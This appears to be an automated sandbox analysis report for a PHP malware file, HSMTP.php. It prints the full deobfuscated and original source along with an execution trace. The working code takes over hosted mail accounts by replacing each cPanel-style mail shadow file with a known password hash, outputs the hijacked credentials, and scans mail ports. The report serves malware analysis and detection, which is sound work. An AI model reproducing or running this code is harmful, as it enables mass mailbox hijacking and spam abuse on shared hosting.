PHP Malware Analysis
HSMTP.php
md5: 09784ff5aec57caa698ca8792e2fe572
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- set_time_limit (Deobfuscated, Original, Traces)
Files
- file_get_contents (Deobfuscated, Original)
Deobfuscated PHP code
<?php
//Bksmile **(RooTTN)**
set_time_limit(0);
ini_set('max_execution_time', 0);
ini_set('memory_limit', -1);
// port to scan
$ports = array(25, 587, 465, 110, 995, 143, 993);
$primary_port = '25';
//curent user
$user = get_current_user();
// Smtp password
$password = 'kingslake';
//crypt
$pwd = crypt($password, '$6$roottn$');
// host name
$t = $_SERVER['SERVER_NAME'];
//edit
$t = @str_replace("www.", "", $t);
$dirs = glob('/home/' . $user . '/etc/*', GLOB_ONLYDIR);
foreach ($dirs as $dir) {
$ex = explode("/", $dir);
$site = $ex[count($ex) - 1];
//get users
@($passwd = file_get_contents('/home/' . $user . '/etc/' . $site . '/shadow'));
//edit
$ex = explode("\r\n", $passwd);
//backup shadow
@link('/home/' . $user . '/etc/' . $site . '/shadow', '/home/' . $user . '/etc/' . $site . '/shadow.roottn.bak');
//delete shadow
@unlink('/home/' . $user . '/etc/' . $site . '/shadow');
// :D
foreach ($ex as $ex) {
$ex = explode(':', $ex);
$e = $ex[0];
if ($e) {
$b = fopen('/home/' . $user . '/etc/' . $site . '/shadow', 'ab');
fwrite($b, $e . ':' . $pwd . ':16249:::::' . "\r\n");
fclose($b);
echo '<span style=\'color:#0000ff;\'>' . $site . '|25|' . $e . '@' . $site . '|' . $password . '</span><br>';
"</center>";
}
}
//port scan
foreach ($ports as $port) {
$connection = @fsockopen($site, $port, $errno, $errstr, 2);
if (is_resource($connection)) {
echo '<span>' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</span>' . ", ";
fclose($connection);
}
}
echo "<br/>";
}Execution traces
data/traces/09784ff5aec57caa698ca8792e2fe572_trace-1676251780.5892.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:30:06.487013]
1 0 1 0.000161 393512
1 3 0 0.000280 406744 {main} 1 /var/www/html/uploads/HSMTP.php 0 0
2 4 0 0.000297 406744 set_time_limit 0 /var/www/html/uploads/HSMTP.php 3 1 0
2 4 1 0.000314 406808
2 4 R FALSE
2 5 0 0.000328 406776 ini_set 0 /var/www/html/uploads/HSMTP.php 4 2 'max_execution_time' 0
2 5 1 0.000345 406816
2 5 R '0'
2 6 0 0.000358 406744 ini_set 0 /var/www/html/uploads/HSMTP.php 5 2 'memory_limit' -1
2 6 1 0.000373 406880
2 6 R '128M'
1 A /var/www/html/uploads/HSMTP.php 7 $ports = [0 => 25, 1 => 587, 2 => 465, 3 => 110, 4 => 995, 5 => 143, 6 => 993]
1 A /var/www/html/uploads/HSMTP.php 8 $primary_port = '25'
2 7 0 0.000415 406776 get_current_user 0 /var/www/html/uploads/HSMTP.php 10 0
2 7 1 0.000450 406816
2 7 R 'osboxes'
1 A /var/www/html/uploads/HSMTP.php 10 $user = 'osboxes'
1 A /var/www/html/uploads/HSMTP.php 12 $password = 'kingslake'
2 8 0 0.000487 406816 crypt 0 /var/www/html/uploads/HSMTP.php 14 2 'kingslake' '$6$roottn$'
2 8 1 0.002606 407008
2 8 R '$6$roottn$f4gq6BO55O7XORbtphIDJ1/IobUGAnthJXdBaE.yIlSydXGLc.E11K/Aa0Qeu4YQdCplfe3VyOdqIJFrt2iUT/'
1 A /var/www/html/uploads/HSMTP.php 14 $pwd = '$6$roottn$f4gq6BO55O7XORbtphIDJ1/IobUGAnthJXdBaE.yIlSydXGLc.E11K/Aa0Qeu4YQdCplfe3VyOdqIJFrt2iUT/'
1 A /var/www/html/uploads/HSMTP.php 16 $t = 'localhost'
2 9 0 0.002661 406944 str_replace 0 /var/www/html/uploads/HSMTP.php 18 3 'www.' '' 'localhost'
2 9 1 0.002677 407040
2 9 R 'localhost'
1 A /var/www/html/uploads/HSMTP.php 18 $t = 'localhost'
2 10 0 0.002703 406992 glob 0 /var/www/html/uploads/HSMTP.php 20 2 '/home/osboxes/etc/*' 8192
2 10 1 0.002723 407112
2 10 R []
1 A /var/www/html/uploads/HSMTP.php 20 $dirs = []
1 3 1 0.002749 407000
0.002778 315136
TRACE END [2023-02-12 23:30:06.489659]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
//Bksmile **(RooTTN)**
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('memory_limit',-1);
// port to scan
$ports=array(25, 587, 465, 110, 995, 143 , 993);
$primary_port='25';
//curent user
$user=get_current_user();
// Smtp password
$password='kingslake';
//crypt
$pwd = crypt($password,'$6$roottn$');
// host name
$t = $_SERVER['SERVER_NAME'];
//edit
$t = @str_replace("www.","",$t);
$dirs = glob('/home/'.$user.'/etc/*', GLOB_ONLYDIR);
foreach($dirs as $dir){
$ex = explode("/",$dir);
$site = $ex[count($ex)-1];
//get users
@$passwd = file_get_contents('/home/'.$user.'/etc/'.$site.'/shadow');
//edit
$ex=explode("\r\n",$passwd);
//backup shadow
@link('/home/'.$user.'/etc/'.$site.'/shadow','/home/'.$user.'/etc/'.$site.'/shadow.roottn.bak');
//delete shadow
@unlink('/home/'.$user.'/etc/'.$site.'/shadow');
// :D
foreach($ex as $ex){
$ex=explode(':',$ex);
$e= $ex[0];
if ($e){
$b=fopen('/home/'.$user.'/etc/'.$site.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
echo '<span style=\'color:#0000ff;\'>'.$site.'|25|'.$e.'@'.$site.'|'.$password.'</span><br>'; "</center>";
}}
//port scan
foreach ($ports as $port)
{
$connection = @fsockopen($site, $port, $errno, $errstr, 2);
if (is_resource($connection))
{
echo '<span>' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</span>' . ", ";
fclose($connection);
}
}
echo "<br/>";
}
?>